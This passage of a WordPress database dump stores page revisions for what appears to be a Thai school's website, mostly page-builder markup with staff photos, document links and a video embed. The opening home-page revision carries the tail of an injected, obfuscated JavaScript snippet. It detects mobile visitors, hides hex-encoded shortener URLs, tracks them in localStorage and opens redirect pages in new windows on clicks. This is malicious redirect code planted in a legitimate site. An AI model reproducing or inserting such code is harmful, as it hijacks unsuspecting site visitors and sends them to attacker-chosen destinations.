function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:18:39','2025-07-15 09:18:39','',19,'http://watprato.ssk.in.th/?p=712',0,'revision','',0),
(713,1,'2025-07-15 16:19:25','2025-07-15 09:19:25','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container 